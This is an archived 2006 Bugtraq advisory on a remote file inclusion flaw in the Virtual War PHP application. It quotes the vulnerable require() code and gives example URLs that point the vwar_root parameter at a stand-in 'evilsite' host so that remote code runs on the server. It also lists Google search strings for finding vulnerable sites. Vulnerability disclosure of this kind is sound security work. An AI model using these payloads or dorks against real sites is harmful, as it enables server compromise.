lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060408132758.16809.qmail@securityfocus.com>
Date: 8 Apr 2006 13:27:58 -0000
From: liz0@...mail.com
To: bugtraq@...urityfocus.com
Subject: Virtual War File &#304;nclusion


Virtual War File inclusion 
---------------------------------
Site:http://www.vwar.de/
Demo:http://www.vwar.de/demo/

---------------------------------------
File Żnclusion


// get functions
$vwar_root = "./";

require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");


Vwar_root parameter File inclusion 

Aut File 

war.php,stats.php,news.php,joinus.php,challenge.php,calendar.php,member.php,popup.php

and 

all admin folder files

---------------------------------------
example

1)

http://victim.com/path/admin/admin.php?vwar_root=http://evilsite

2)(phpnuke module)

http://victim.com/path/modules/vwar/admin/admin.php?vwar_root=http://evilsite


-----------------------------------------
Credit:Liz0ziM
E-mail:liz0@...mail.com
Site:www.biyo.tk www.biyosecurity.be

-----------------------------------------
google:

"Powered by: Virtual War v1.5.0"

inurl:"modules.php?name=vwar"

-------------------------------------

Source:
http://www.blogcu.com/Liz0ziM/431925/
http://liz0zim.no-ip.org/vwar.txt


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ